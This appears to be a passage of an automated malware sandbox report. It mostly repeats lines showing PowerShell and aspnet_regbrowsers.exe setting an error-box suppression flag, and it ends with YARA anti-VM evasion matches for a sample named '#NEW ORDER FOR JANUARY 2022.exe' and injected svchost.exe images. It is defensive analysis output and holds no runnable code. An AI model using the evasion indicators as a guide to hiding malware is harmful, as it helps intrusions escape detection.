                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 32.2.svchost.exe.5f89510.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.6330000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.5f70000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.5f70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.6349510.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5aa9510.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.6330000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000030.00000002.929093994.0000000006280000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.920418875.0000000005C10000.00000004.00020000.sdmp, type: MEMORY
